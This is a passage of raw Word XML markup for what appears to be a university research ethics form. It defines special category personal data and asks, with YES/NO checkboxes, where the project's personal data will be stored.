            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>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3E1D6996" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>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09687058" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="4E989612" w14:textId="77777777" w:rsidTr="00CA0B9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cPr>
          <w:p w14:paraId="58D8EEBB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pP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54B69EE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>“Special category data” means sensitive personal data consisting of information as to the data subjects’ –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092B9BD1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(a) racial or ethnic origin,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="690557EC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(b) political opinions,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0ADF04" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(c) religious beliefs or other beliefs of a similar nature,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="751A4D9A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(d) membership of a trade union (within the meaning of the Trade Union and Labour Relations (Consolidation) Act 1992),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D201325" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(e) physical or mental health or condition,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228B3235" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(f) sexual life,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5111E4D5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(g) genetics,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3684A775" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>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A18F272" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A19C911" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="MS Gothic" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>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A438038" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
                <w:lang w:val="en-US" w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A9AC586" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:id w:val="1472099985"/>
                <w14:checkbox>
                  <w14:checked w14:val="1"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="1C60275A" w14:textId="77777777" w:rsidTr="00CA0B9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cPr>
          <w:p w14:paraId="4EC21C10" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>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07BB5E65" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>If YES, provide a description of the special category data and explain why this data needs to be collected:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A20EE3B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10485" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="7905"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="1026"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="7F31FBB6" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2FD259F9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="33D27ABA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:br w:type="page"/>
              <w:t>Will the research activity involve storing personal data and/or special category data on one of the following:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2CBB002C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1D026038" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="4EBC91B3" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B927E3D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E01AD38" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Manual files (i.e. in paper form)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-716891366"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="215F2CFD"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="124512450"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="5B4DB243"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565FA631" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="332E664E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="161795DB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>University computers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1058942064"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="21DCAC08"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1525707884"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="29C06E99"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22AC9CFF" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2E779200" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3C28C891" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Private company computers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="428779520"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="03A32FDB"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1738441066"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="266F9B7C"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5EA7B83A" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="530F97E9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1843A51B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Home or other personal computers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="666676712"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7621C004"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="243309197"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="07D05709"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5876043F" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="63537F9B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="155344CA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Laptop computers/ CDs/ Portable disk-drives/ memory sticks?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1761182650"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="3682A6F1"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1031489010"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4D4B2FCF"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2629E288" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="428DBBE1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="526D7C28" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>“Cloud” storage or websites?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-40376448"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4D40E711"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1026" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-2004037841"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4DED5D87"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17A1DCE5" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2FE430C2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="602F428A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Other – specify:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10188D97" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1556230815"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
